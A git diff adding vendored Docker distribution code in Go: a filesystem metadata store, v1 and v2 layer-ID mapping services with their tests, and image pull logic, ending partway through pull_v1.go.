/\"],\"Image\":\"\",\"Volumes\":null,\"VolumeDriver\":\"\",\"WorkingDir\":\"\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":null,\"Labels\":null},\"docker_version\":\"1.7.1\",\"config\":{\"Hostname\":\"9aeb0006ffa7\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":null,\"Cmd\":null,\"Image\":\"\",\"Volumes\":null,\"VolumeDriver\":\"\",\"WorkingDir\":\"\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":null,\"Labels\":null},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":960}\n" + } + ], + "signatures": [ + { + "header": { + "jwk": { + "crv": "P-256", + "kid": "OIH7:HQFS:44FK:45VB:3B53:OIAG:TPL4:ATF5:6PNE:MGHN:NHQX:2GE4", + "kty": "EC", + "x": "Cu_UyxwLgHzE9rvlYSmvVdqYCXY42E9eNhBb0xNv0SQ", + "y": "zUsjWJkeKQ5tv7S-hl1Tg71cd-CqnrtiiLxSi6N_yc8" + }, + "alg": "ES256" + }, + "signature": "Y6xaFz9Sy-OtcnKQS1Ilq3Dh8cu4h3nBTJCpOTF1XF7vKtcxxA_xMP8-SgDo869SJ3VsvgPL9-Xn-OoYG2rb1A", + "protected": "eyJmb3JtYXRMZW5ndGgiOjMxOTcsImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAxNS0wOS0xMVQwNDoxMzo0OFoifQ" + } + ] +} \ No newline at end of file diff --git a/vendor/github.com/docker/docker/distribution/metadata/metadata.go b/vendor/github.com/docker/docker/distribution/metadata/metadata.go new file mode 100644 index 0000000000..05ba4f817d --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/metadata/metadata.go @@ -0,0 +1,75 @@ +package metadata + +import ( + "io/ioutil" + "os" + "path/filepath" + "sync" + + "github.com/docker/docker/pkg/ioutils" +) + +// Store implements a K/V store for mapping distribution-related IDs +// to on-disk layer IDs and image IDs. The namespace identifies the type of +// mapping (i.e. "v1ids" or "artifacts"). MetadataStore is goroutine-safe. +type Store interface { + // Get retrieves data by namespace and key. + Get(namespace string, key string) ([]byte, error) + // Set writes data indexed by namespace and key. + Set(namespace, key string, value []byte) error + // Delete removes data indexed by namespace and key. + Delete(namespace, key string) error +} + +// FSMetadataStore uses the filesystem to associate metadata with layer and +// image IDs. +type FSMetadataStore struct { + sync.RWMutex + basePath string +} + +// NewFSMetadataStore creates a new filesystem-based metadata store. +func NewFSMetadataStore(basePath string) (*FSMetadataStore, error) { + if err := os.MkdirAll(basePath, 0700); err != nil { + return nil, err + } + return &FSMetadataStore{ + basePath: basePath, + }, nil +} + +func (store *FSMetadataStore) path(namespace, key string) string { + return filepath.Join(store.basePath, namespace, key) +} + +// Get retrieves data by namespace and key. The data is read from a file named +// after the key, stored in the namespace's directory. +func (store *FSMetadataStore) Get(namespace string, key string) ([]byte, error) { + store.RLock() + defer store.RUnlock() + + return ioutil.ReadFile(store.path(namespace, key)) +} + +// Set writes data indexed by namespace and key. The data is written to a file +// named after the key, stored in the namespace's directory. +func (store *FSMetadataStore) Set(namespace, key string, value []byte) error { + store.Lock() + defer store.Unlock() + + path := store.path(namespace, key) + if err := os.MkdirAll(filepath.Dir(path), 0755); err != nil { + return err + } + return ioutils.AtomicWriteFile(path, value, 0644) +} + +// Delete removes data indexed by namespace and key. The data file named after +// the key, stored in the namespace's directory is deleted. +func (store *FSMetadataStore) Delete(namespace, key string) error { + store.Lock() + defer store.Unlock() + + path := store.path(namespace, key) + return os.Remove(path) +} diff --git a/vendor/github.com/docker/docker/distribution/metadata/v1_id_service.go b/vendor/github.com/docker/docker/distribution/metadata/v1_id_service.go new file mode 100644 index 0000000000..f262d4dc34 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/metadata/v1_id_service.go @@ -0,0 +1,51 @@ +package metadata + +import ( + "github.com/docker/docker/image/v1" + "github.com/docker/docker/layer" + "github.com/pkg/errors" +) + +// V1IDService maps v1 IDs to layers on disk. +type V1IDService struct { + store Store +} + +// NewV1IDService creates a new V1 ID mapping service. +func NewV1IDService(store Store) *V1IDService { + return &V1IDService{ + store: store, + } +} + +// namespace returns the namespace used by this service. +func (idserv *V1IDService) namespace() string { + return "v1id" +} + +// Get finds a layer by its V1 ID. +func (idserv *V1IDService) Get(v1ID, registry string) (layer.DiffID, error) { + if idserv.store == nil { + return "", errors.New("no v1IDService storage") + } + if err := v1.ValidateID(v1ID); err != nil { + return layer.DiffID(""), err + } + + idBytes, err := idserv.store.Get(idserv.namespace(), registry+","+v1ID) + if err != nil { + return layer.DiffID(""), err + } + return layer.DiffID(idBytes), nil +} + +// Set associates an image with a V1 ID. +func (idserv *V1IDService) Set(v1ID, registry string, id layer.DiffID) error { + if idserv.store == nil { + return nil + } + if err := v1.ValidateID(v1ID); err != nil { + return err + } + return idserv.store.Set(idserv.namespace(), registry+","+v1ID, []byte(id)) +} diff --git a/vendor/github.com/docker/docker/distribution/metadata/v1_id_service_test.go b/vendor/github.com/docker/docker/distribution/metadata/v1_id_service_test.go new file mode 100644 index 0000000000..556886581e --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/metadata/v1_id_service_test.go @@ -0,0 +1,83 @@ +package metadata + +import ( + "io/ioutil" + "os" + "testing" + + "github.com/docker/docker/layer" +) + +func TestV1IDService(t *testing.T) { + tmpDir, err := ioutil.TempDir("", "v1-id-service-test") + if err != nil { + t.Fatalf("could not create temp dir: %v", err) + } + defer os.RemoveAll(tmpDir) + + metadataStore, err := NewFSMetadataStore(tmpDir) + if err != nil { + t.Fatalf("could not create metadata store: %v", err) + } + v1IDService := NewV1IDService(metadataStore) + + testVectors := []struct { + registry string + v1ID string + layerID layer.DiffID + }{ + { + registry: "registry1", + v1ID: "f0cd5ca10b07f35512fc2f1cbf9a6cefbdb5cba70ac6b0c9e5988f4497f71937", + layerID: layer.DiffID("sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"), + }, + { + registry: "registry2", + v1ID: "9e3447ca24cb96d86ebd5960cb34d1299b07e0a0e03801d90b9969a2c187dd6e", + layerID: layer.DiffID("sha256:86e0e091d0da6bde2456dbb48306f3956bbeb2eae1b5b9a43045843f69fe4aaa"), + }, + { + registry: "registry1", + v1ID: "9e3447ca24cb96d86ebd5960cb34d1299b07e0a0e03801d90b9969a2c187dd6e", + layerID: layer.DiffID("sha256:03f4658f8b782e12230c1783426bd3bacce651ce582a4ffb6fbbfa2079428ecb"), + }, + } + + // Set some associations + for _, vec := range testVectors { + err := v1IDService.Set(vec.v1ID, vec.registry, vec.layerID) + if err != nil { + t.Fatalf("error calling Set: %v", err) + } + } + + // Check the correct values are read back + for _, vec := range testVectors { + layerID, err := v1IDService.Get(vec.v1ID, vec.registry) + if err != nil { + t.Fatalf("error calling Get: %v", err) + } + if layerID != vec.layerID { + t.Fatal("Get returned incorrect layer ID") + } + } + + // Test Get on a nonexistent entry + _, err = v1IDService.Get("82379823067823853223359023576437723560923756b03560378f4497753917", "registry1") + if err == nil { + t.Fatal("expected error looking up nonexistent entry") + } + + // Overwrite one of the entries and read it back + err = v1IDService.Set(testVectors[0].v1ID, testVectors[0].registry, testVectors[1].layerID) + if err != nil { + t.Fatalf("error calling Set: %v", err) + } + layerID, err := v1IDService.Get(testVectors[0].v1ID, testVectors[0].registry) + if err != nil { + t.Fatalf("error calling Get: %v", err) + } + if layerID != testVectors[1].layerID { + t.Fatal("Get returned incorrect layer ID") + } +} diff --git a/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service.go b/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service.go new file mode 100644 index 0000000000..02d1b4ad21 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service.go @@ -0,0 +1,241 @@ +package metadata + +import ( + "crypto/hmac" + "crypto/sha256" + "encoding/hex" + "encoding/json" + "errors" + + "github.com/docker/distribution/digest" + "github.com/docker/docker/api/types" + "github.com/docker/docker/layer" +) + +// V2MetadataService maps layer IDs to a set of known metadata for +// the layer. +type V2MetadataService interface { + GetMetadata(diffID layer.DiffID) ([]V2Metadata, error) + GetDiffID(dgst digest.Digest) (layer.DiffID, error) + Add(diffID layer.DiffID, metadata V2Metadata) error + TagAndAdd(diffID layer.DiffID, hmacKey []byte, metadata V2Metadata) error + Remove(metadata V2Metadata) error +} + +// v2MetadataService implements V2MetadataService +type v2MetadataService struct { + store Store +} + +var _ V2MetadataService = &v2MetadataService{} + +// V2Metadata contains the digest and source repository information for a layer. +type V2Metadata struct { + Digest digest.Digest + SourceRepository string + // HMAC hashes above attributes with recent authconfig digest used as a key in order to determine matching + // metadata entries accompanied by the same credentials without actually exposing them. + HMAC string +} + +// CheckV2MetadataHMAC return true if the given "meta" is tagged with a hmac hashed by the given "key". +func CheckV2MetadataHMAC(meta *V2Metadata, key []byte) bool { + if len(meta.HMAC) == 0 || len(key) == 0 { + return len(meta.HMAC) == 0 && len(key) == 0 + } + mac := hmac.New(sha256.New, key) + mac.Write([]byte(meta.Digest)) + mac.Write([]byte(meta.SourceRepository)) + expectedMac := mac.Sum(nil) + + storedMac, err := hex.DecodeString(meta.HMAC) + if err != nil { + return false + } + + return hmac.Equal(storedMac, expectedMac) +} + +// ComputeV2MetadataHMAC returns a hmac for the given "meta" hash by the given key. +func ComputeV2MetadataHMAC(key []byte, meta *V2Metadata) string { + if len(key) == 0 || meta == nil { + return "" + } + mac := hmac.New(sha256.New, key) + mac.Write([]byte(meta.Digest)) + mac.Write([]byte(meta.SourceRepository)) + return hex.EncodeToString(mac.Sum(nil)) +} + +// ComputeV2MetadataHMACKey returns a key for the given "authConfig" that can be used to hash v2 metadata +// entries. +func ComputeV2MetadataHMACKey(authConfig *types.AuthConfig) ([]byte, error) { + if authConfig == nil { + return nil, nil + } + key := authConfigKeyInput{ + Username: authConfig.Username, + Password: authConfig.Password, + Auth: authConfig.Auth, + IdentityToken: authConfig.IdentityToken, + RegistryToken: authConfig.RegistryToken, + } + buf, err := json.Marshal(&key) + if err != nil { + return nil, err + } + return []byte(digest.FromBytes([]byte(buf))), nil +} + +// authConfigKeyInput is a reduced AuthConfig structure holding just relevant credential data eligible for +// hmac key creation. +type authConfigKeyInput struct { + Username string `json:"username,omitempty"` + Password string `json:"password,omitempty"` + Auth string `json:"auth,omitempty"` + + IdentityToken string `json:"identitytoken,omitempty"` + RegistryToken string `json:"registrytoken,omitempty"` +} + +// maxMetadata is the number of metadata entries to keep per layer DiffID. +const maxMetadata = 50 + +// NewV2MetadataService creates a new diff ID to v2 metadata mapping service. +func NewV2MetadataService(store Store) V2MetadataService { + return &v2MetadataService{ + store: store, + } +} + +func (serv *v2MetadataService) diffIDNamespace() string { + return "v2metadata-by-diffid" +} + +func (serv *v2MetadataService) digestNamespace() string { + return "diffid-by-digest" +} + +func (serv *v2MetadataService) diffIDKey(diffID layer.DiffID) string { + return string(digest.Digest(diffID).Algorithm()) + "/" + digest.Digest(diffID).Hex() +} + +func (serv *v2MetadataService) digestKey(dgst digest.Digest) string { + return string(dgst.Algorithm()) + "/" + dgst.Hex() +} + +// GetMetadata finds the metadata associated with a layer DiffID. +func (serv *v2MetadataService) GetMetadata(diffID layer.DiffID) ([]V2Metadata, error) { + if serv.store == nil { + return nil, errors.New("no metadata storage") + } + jsonBytes, err := serv.store.Get(serv.diffIDNamespace(), serv.diffIDKey(diffID)) + if err != nil { + return nil, err + } + + var metadata []V2Metadata + if err := json.Unmarshal(jsonBytes, &metadata); err != nil { + return nil, err + } + + return metadata, nil +} + +// GetDiffID finds a layer DiffID from a digest. +func (serv *v2MetadataService) GetDiffID(dgst digest.Digest) (layer.DiffID, error) { + if serv.store == nil { + return layer.DiffID(""), errors.New("no metadata storage") + } + diffIDBytes, err := serv.store.Get(serv.digestNamespace(), serv.digestKey(dgst)) + if err != nil { + return layer.DiffID(""), err + } + + return layer.DiffID(diffIDBytes), nil +} + +// Add associates metadata with a layer DiffID. If too many metadata entries are +// present, the oldest one is dropped. +func (serv *v2MetadataService) Add(diffID layer.DiffID, metadata V2Metadata) error { + if serv.store == nil { + // Support a service which has no backend storage, in this case + // an add becomes a no-op. + // TODO: implement in memory storage + return nil + } + oldMetadata, err := serv.GetMetadata(diffID) + if err != nil { + oldMetadata = nil + } + newMetadata := make([]V2Metadata, 0, len(oldMetadata)+1) + + // Copy all other metadata to new slice + for _, oldMeta := range oldMetadata { + if oldMeta != metadata { + newMetadata = append(newMetadata, oldMeta) + } + } + + newMetadata = append(newMetadata, metadata) + + if len(newMetadata) > maxMetadata { + newMetadata = newMetadata[len(newMetadata)-maxMetadata:] + } + + jsonBytes, err := json.Marshal(newMetadata) + if err != nil { + return err + } + + err = serv.store.Set(serv.diffIDNamespace(), serv.diffIDKey(diffID), jsonBytes) + if err != nil { + return err + } + + return serv.store.Set(serv.digestNamespace(), serv.digestKey(metadata.Digest), []byte(diffID)) +} + +// TagAndAdd amends the given "meta" for hmac hashed by the given "hmacKey" and associates it with a layer +// DiffID. If too many metadata entries are present, the oldest one is dropped. +func (serv *v2MetadataService) TagAndAdd(diffID layer.DiffID, hmacKey []byte, meta V2Metadata) error { + meta.HMAC = ComputeV2MetadataHMAC(hmacKey, &meta) + return serv.Add(diffID, meta) +} + +// Remove unassociates a metadata entry from a layer DiffID. +func (serv *v2MetadataService) Remove(metadata V2Metadata) error { + if serv.store == nil { + // Support a service which has no backend storage, in this case + // an remove becomes a no-op. + // TODO: implement in memory storage + return nil + } + diffID, err := serv.GetDiffID(metadata.Digest) + if err != nil { + return err + } + oldMetadata, err := serv.GetMetadata(diffID) + if err != nil { + oldMetadata = nil + } + newMetadata := make([]V2Metadata, 0, len(oldMetadata)) + + // Copy all other metadata to new slice + for _, oldMeta := range oldMetadata { + if oldMeta != metadata { + newMetadata = append(newMetadata, oldMeta) + } + } + + if len(newMetadata) == 0 { + return serv.store.Delete(serv.diffIDNamespace(), serv.diffIDKey(diffID)) + } + + jsonBytes, err := json.Marshal(newMetadata) + if err != nil { + return err + } + + return serv.store.Set(serv.diffIDNamespace(), serv.diffIDKey(diffID), jsonBytes) +} diff --git a/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service_test.go b/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service_test.go new file mode 100644 index 0000000000..7b0ecb1572 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service_test.go @@ -0,0 +1,115 @@ +package metadata + +import ( + "encoding/hex" + "io/ioutil" + "math/rand" + "os" + "reflect" + "testing" + + "github.com/docker/distribution/digest" + "github.com/docker/docker/layer" +) + +func TestV2MetadataService(t *testing.T) { + tmpDir, err := ioutil.TempDir("", "blobsum-storage-service-test") + if err != nil { + t.Fatalf("could not create temp dir: %v", err) + } + defer os.RemoveAll(tmpDir) + + metadataStore, err := NewFSMetadataStore(tmpDir) + if err != nil { + t.Fatalf("could not create metadata store: %v", err) + } + V2MetadataService := NewV2MetadataService(metadataStore) + + tooManyBlobSums := make([]V2Metadata, 100) + for i := range tooManyBlobSums { + randDigest := randomDigest() + tooManyBlobSums[i] = V2Metadata{Digest: randDigest} + } + + testVectors := []struct { + diffID layer.DiffID + metadata []V2Metadata + }{ + { + diffID: layer.DiffID("sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"), + metadata: []V2Metadata{ + {Digest: digest.Digest("sha256:f0cd5ca10b07f35512fc2f1cbf9a6cefbdb5cba70ac6b0c9e5988f4497f71937")}, + }, + }, + { + diffID: layer.DiffID("sha256:86e0e091d0da6bde2456dbb48306f3956bbeb2eae1b5b9a43045843f69fe4aaa"), + metadata: []V2Metadata{ + {Digest: digest.Digest("sha256:f0cd5ca10b07f35512fc2f1cbf9a6cefbdb5cba70ac6b0c9e5988f4497f71937")}, + {Digest: digest.Digest("sha256:9e3447ca24cb96d86ebd5960cb34d1299b07e0a0e03801d90b9969a2c187dd6e")}, + }, + }, + { + diffID: layer.DiffID("sha256:03f4658f8b782e12230c1783426bd3bacce651ce582a4ffb6fbbfa2079428ecb"), + metadata: tooManyBlobSums, + }, + } + + // Set some associations + for _, vec := range testVectors { + for _, blobsum := range vec.metadata { + err := V2MetadataService.Add(vec.diffID, blobsum) + if err != nil { + t.Fatalf("error calling Set: %v", err) + } + } + } + + // Check the correct values are read back + for _, vec := range testVectors { + metadata, err := V2MetadataService.GetMetadata(vec.diffID) + if err != nil { + t.Fatalf("error calling Get: %v", err) + } + expectedMetadataEntries := len(vec.metadata) + if expectedMetadataEntries > 50 { + expectedMetadataEntries = 50 + } + if !reflect.DeepEqual(metadata, vec.metadata[len(vec.metadata)-expectedMetadataEntries:len(vec.metadata)]) { + t.Fatal("Get returned incorrect layer ID") + } + } + + // Test GetMetadata on a nonexistent entry + _, err = V2MetadataService.GetMetadata(layer.DiffID("sha256:82379823067823853223359023576437723560923756b03560378f4497753917")) + if err == nil { + t.Fatal("expected error looking up nonexistent entry") + } + + // Test GetDiffID on a nonexistent entry + _, err = V2MetadataService.GetDiffID(digest.Digest("sha256:82379823067823853223359023576437723560923756b03560378f4497753917")) + if err == nil { + t.Fatal("expected error looking up nonexistent entry") + } + + // Overwrite one of the entries and read it back + err = V2MetadataService.Add(testVectors[1].diffID, testVectors[0].metadata[0]) + if err != nil { + t.Fatalf("error calling Add: %v", err) + } + diffID, err := V2MetadataService.GetDiffID(testVectors[0].metadata[0].Digest) + if err != nil { + t.Fatalf("error calling GetDiffID: %v", err) + } + if diffID != testVectors[1].diffID { + t.Fatal("GetDiffID returned incorrect diffID") + } +} + +func randomDigest() digest.Digest { + b := [32]byte{} + for i := 0; i < len(b); i++ { + b[i] = byte(rand.Intn(256)) + } + d := hex.EncodeToString(b[:]) + return digest.Digest("sha256:" + d) +} diff --git a/vendor/github.com/docker/docker/distribution/pull.go b/vendor/github.com/docker/docker/distribution/pull.go new file mode 100644 index 0000000000..a0acfe5b6b --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/pull.go @@ -0,0 +1,200 @@ +package distribution + +import ( + "fmt" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/digest" + "github.com/docker/docker/api" + "github.com/docker/docker/distribution/metadata" + "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + "golang.org/x/net/context" +) + +// Puller is an interface that abstracts pulling for different API versions. +type Puller interface { + // Pull tries to pull the image referenced by `tag` + // Pull returns an error if any, as well as a boolean that determines whether to retry Pull on the next configured endpoint. + // + Pull(ctx context.Context, ref reference.Named) error +} + +// newPuller returns a Puller interface that will pull from either a v1 or v2 +// registry. The endpoint argument contains a Version field that determines +// whether a v1 or v2 puller will be created. The other parameters are passed +// through to the underlying puller implementation for use during the actual +// pull operation. +func newPuller(endpoint registry.APIEndpoint, repoInfo *registry.RepositoryInfo, imagePullConfig *ImagePullConfig) (Puller, error) { + switch endpoint.Version { + case registry.APIVersion2: + return &v2Puller{ + V2MetadataService: metadata.NewV2MetadataService(imagePullConfig.MetadataStore), + endpoint: endpoint, + config: imagePullConfig, + repoInfo: repoInfo, + }, nil + case registry.APIVersion1: + return &v1Puller{ + v1IDService: metadata.NewV1IDService(imagePullConfig.MetadataStore), + endpoint: endpoint, + config: imagePullConfig, + repoInfo: repoInfo, + }, nil + } + return nil, fmt.Errorf("unknown version %d for registry %s", endpoint.Version, endpoint.URL) +} + +// Pull initiates a pull operation. image is the repository name to pull, and +// tag may be either empty, or indicate a specific tag to pull. +func Pull(ctx context.Context, ref reference.Named, imagePullConfig *ImagePullConfig) error { + // Resolve the Repository name from fqn to RepositoryInfo + repoInfo, err := imagePullConfig.RegistryService.ResolveRepository(ref) + if err != nil { + return err + } + + // makes sure name is not empty or `scratch` + if err := ValidateRepoName(repoInfo.Name()); err != nil { + return err + } + + endpoints, err := imagePullConfig.RegistryService.LookupPullEndpoints(repoInfo.Hostname()) + if err != nil { + return err + } + + var ( + lastErr error + + // discardNoSupportErrors is used to track whether an endpoint encountered an error of type registry.ErrNoSupport + // By default it is false, which means that if an ErrNoSupport error is encountered, it will be saved in lastErr. + // As soon as another kind of error is encountered, discardNoSupportErrors is set to true, avoiding the saving of + // any subsequent ErrNoSupport errors in lastErr. + // It's needed for pull-by-digest on v1 endpoints: if there are only v1 endpoints configured, the error should be + // returned and displayed, but if there was a v2 endpoint which supports pull-by-digest, then the last relevant + // error is the ones from v2 endpoints not v1. + discardNoSupportErrors bool + + // confirmedV2 is set to true if a pull attempt managed to + // confirm that it was talking to a v2 registry. This will + // prevent fallback to the v1 protocol. + confirmedV2 bool + + // confirmedTLSRegistries is a map indicating which registries + // are known to be using TLS. There should never be a plaintext + // retry for any of these. + confirmedTLSRegistries = make(map[string]struct{}) + ) + for _, endpoint := range endpoints { + if imagePullConfig.RequireSchema2 && endpoint.Version == registry.APIVersion1 { + continue + } + + if confirmedV2 && endpoint.Version == registry.APIVersion1 { + logrus.Debugf("Skipping v1 endpoint %s because v2 registry was detected", endpoint.URL) + continue + } + + if endpoint.URL.Scheme != "https" { + if _, confirmedTLS := confirmedTLSRegistries[endpoint.URL.Host]; confirmedTLS { + logrus.Debugf("Skipping non-TLS endpoint %s for host/port that appears to use TLS", endpoint.URL) + continue + } + } + + logrus.Debugf("Trying to pull %s from %s %s", repoInfo.Name(), endpoint.URL, endpoint.Version) + + puller, err := newPuller(endpoint, repoInfo, imagePullConfig) + if err != nil { + lastErr = err + continue + } + if err := puller.Pull(ctx, ref); err != nil { + // Was this pull cancelled? If so, don't try to fall + // back. + fallback := false + select { + case <-ctx.Done(): + default: + if fallbackErr, ok := err.(fallbackError); ok { + fallback = true + confirmedV2 = confirmedV2 || fallbackErr.confirmedV2 + if fallbackErr.transportOK && endpoint.URL.Scheme == "https" { + confirmedTLSRegistries[endpoint.URL.Host] = struct{}{} + } + err = fallbackErr.err + } + } + if fallback { + if _, ok := err.(ErrNoSupport); !ok { + // Because we found an error that's not ErrNoSupport, discard all subsequent ErrNoSupport errors. + discardNoSupportErrors = true + // append subsequent errors + lastErr = err + } else if !discardNoSupportErrors { + // Save the ErrNoSupport error, because it's either the first error or all encountered errors + // were also ErrNoSupport errors. + // append subsequent errors + lastErr = err + } + logrus.Errorf("Attempting next endpoint for pull after error: %v", err) + continue + } + logrus.Errorf("Not continuing with pull after error: %v", err) + return TranslatePullError(err, ref) + } + + imagePullConfig.ImageEventLogger(ref.String(), repoInfo.Name(), "pull") + return nil + } + + if lastErr == nil { + lastErr = fmt.Errorf("no endpoints found for %s", ref.String()) + } + + return TranslatePullError(lastErr, ref) +} + +// writeStatus writes a status message to out. If layersDownloaded is true, the +// status message indicates that a newer image was downloaded. Otherwise, it +// indicates that the image is up to date. requestedTag is the tag the message +// will refer to. +func writeStatus(requestedTag string, out progress.Output, layersDownloaded bool) { + if layersDownloaded { + progress.Message(out, "", "Status: Downloaded newer image for "+requestedTag) + } else { + progress.Message(out, "", "Status: Image is up to date for "+requestedTag) + } +} + +// ValidateRepoName validates the name of a repository. +func ValidateRepoName(name string) error { + if name == "" { + return fmt.Errorf("Repository name can't be empty") + } + if name == api.NoBaseImageSpecifier { + return fmt.Errorf("'%s' is a reserved name", api.NoBaseImageSpecifier) + } + return nil +} + +func addDigestReference(store reference.Store, ref reference.Named, dgst digest.Digest, id digest.Digest) error { + dgstRef, err := reference.WithDigest(reference.TrimNamed(ref), dgst) + if err != nil { + return err + } + + if oldTagID, err := store.Get(dgstRef); err == nil { + if oldTagID != id { + // Updating digests not supported by reference store + logrus.Errorf("Image ID for digest %s changed from %s to %s, cannot update", dgst.String(), oldTagID, id) + } + return nil + } else if err != reference.ErrDoesNotExist { + return err + } + + return store.AddDigest(dgstRef, id, true) +} diff --git a/vendor/github.com/docker/docker/distribution/pull_v1.go b/vendor/github.com/docker/docker/distribution/pull_v1.go new file mode 100644 index 0000000000..f44ed4f371 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/pull_v1.go @@ -0,0 +1,368 @@ +package distribution + +import ( + "errors" + "fmt" + "io" + "io/ioutil" + "net" + "net/url" + "os" + "strings" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/registry/client/transport" + "github.com/docker/docker/distribution/metadata" + "github.com/docker/docker/distribution/xfer" + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/image" + "github.com/docker/docker/image/v1" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + "golang.org/x/net/context" +) + +type v1Puller struct { + v1IDService *metadata.V1IDService + endpoint registry.APIEndpoint + config *ImagePullConfig + repoInfo *registry.RepositoryInfo + session *registry.Session +} + +func (p *v1Puller) Pull(ctx context.Context, ref reference.Named) error { + if _, isCanonical := ref.(reference.Canonical); isCanonical { + // Allowing fallback, because HTTPS v1 is before HTTP v2 + return fallbackError{err: ErrNoSupport{Err: errors.New("Cannot pull by digest with v1 registry")}} + } + + tlsConfig, err := p.config.RegistryService.TLSConfig(p.repoInfo.Index.Name) + if err != nil { + return err + } + // Adds Docker-specific headers as well as user-specified headers (metaHeaders) + tr := transport.NewTransport( + // TODO(tiborvass): was ReceiveTimeout + registry.NewTransport(tlsConfig), + registry.DockerHeaders(dockerversion.DockerUserAgent(ctx), p.config.MetaHeaders)..., + ) + client := registry.HTTPClient(tr) + v1Endpoint, err := p.endpoint.ToV1Endpoint(dockerversion.DockerUserAgent(ctx), p.config.MetaHeaders) + if err != nil { + logrus.Debugf("Could not get v1 endpoint: %v", err) + return fallbackError{err: err} + } + p.session, err = registry.NewSession(client, p.config.AuthConfig, v1Endpoint) + if err != nil { + // TODO(dmcgowan): Check if should fallback + logrus.Debugf("Fallback from error: %s", err) + return fallbackError{err: err} + } + if err := p.pullRepository(ctx, ref); err != nil { + // TODO(dmcgowan): Check if should fallback + return err + } + progress.Message(p.config.ProgressOutput, "", p.repoInfo.FullName()+": this image was pulled from a legacy registry. Important: This registry version will not be supported in future versions of docker.") + + return nil +} + +func (p *v1Puller) pullRepository(ctx context.Context, ref reference.Named) error { + progress.Message(p.config.ProgressOutput, "", "Pulling repository "+p.repoInfo.FullName()) + + tagged, isTagged := ref.(reference.NamedTagged) + + repoData, err := p.session.GetRepositoryData(p.repoInfo) + if err != nil { + if strings.Contains(err.Error(), "HTTP code: 404") { + if isTagged { + return fmt.Errorf("Error: image %s:%s not found", p.repoInfo.RemoteName(), tagged.Tag()) + } + return fmt.Errorf("Error: image %s not found", p.repoInfo.RemoteName()) + } + // Unexpected HTTP error + return err + } + + logrus.Debug("Retrieving the tag list") + var tagsList map[string]string + if !isTagged { + tagsList, err = p.session.GetRemoteTags(repoData.Endpoints, p.repoInfo) + } else { + var tagID string + tagsList = make(map[string]string) + tagID, err = p.session.GetRemoteTag(repoData.Endpoints, p.repoInfo, tagged.Tag()) + if err == registry.ErrRepoNotFound { + return fmt.Errorf("Tag %s not found in repository %s", tagged.Tag(), p.repoInfo.FullName()) + } + tagsList[tagged.Tag()] = tagID + } + if err != nil { + logrus.Errorf("unable to get remote tags: %s", err) + return err + } + + for tag, id := range tagsList { + repoData.ImgList[id] = ®istry.ImgData{ + ID: id, + Tag: tag, + Checksum: "", + } + } + + layersDownloaded := false + for _, imgData := range repoData.ImgList { + if isTagged && imgData.Tag != tagged.Tag() { + continue + } + + err := p.downloadImage(ctx, repoData, imgData, &layersDownloaded) + if err != nil { + return err + } + } + + writeStatus(ref.String(), p.config.ProgressOutput, layersDownloaded) + return nil +} + +func (p *v1Puller) downloadImage(ctx context.Context, repoData *registry.RepositoryData, img *registry.ImgData, layersDownloaded *bool) error { + if img.Tag == "" { + logrus.Debugf("Image (id: %s) present in this repository but untagged, skipping", img.ID) + return nil + } + + localNameRef, err := reference.WithTag(p.repoInfo, img.Tag) + if err != nil { + retErr := fmt.Errorf("Image (id: %s) has invalid tag: %s", img.ID, img.Tag) + logrus.Debug(retErr.Error()) + return retErr + } + + if err := v1.ValidateID(img.ID); err != nil { + return err + } + + progress.Updatef(p.config.ProgressOutput, stringid.TruncateID(img.ID), "Pulling image (%s) from %s", img.Tag, p.repoInfo.FullName()) + success := false + var lastErr error + for _, ep := range p.repoInfo.Index.Mirrors { + ep += "v1/" + progress.Updatef(p.config.ProgressOutput, stringid.TruncateID(img.ID), fmt.Sprintf("Pulling image (%s) from %s, mirror: %s", img.Tag, p.repoInfo.FullName(), ep)) + if err = p.pullImage(ctx, img.ID, ep, localNameRef, layersDownloaded); err != nil { + // Don't report errors when pulling from mirrors. + logrus.Debugf("Error pulling image (%s) from %s, mirror: %s, %s", img.Tag, p.repoInfo.FullName(), ep, err) + continue + } + success = true + break + } + if !success { + for _, ep := range repoData.Endpoints { + progress.Updatef(p.config.ProgressOutput, stringid.TruncateID(img.ID), "Pulling image (%s) from %s, endpoint: %s", img.Tag, p.repoInfo.FullName(), ep) + if err = p.pullImage(ctx, img.ID, ep, localNameRef, layersDownloaded); err != nil { + // It's not ideal that only the last error is returned, it would be better to concatenate the errors. + // As the error is also given to the output stream the user will see the error. + lastErr = err + progress.Updatef(p.config.ProgressOutput, stringid.TruncateID(img.ID), "Error pulling image (%s) from %s, endpoint: %s, %s", img.Tag, p.repoInfo.FullName(), ep, err) + continue + } + success = true + break + } + } + if !success { + err := fmt.Errorf("Error pulling image (%s) from %s, %v", img.Tag, p.repoInfo.FullName(), lastErr) 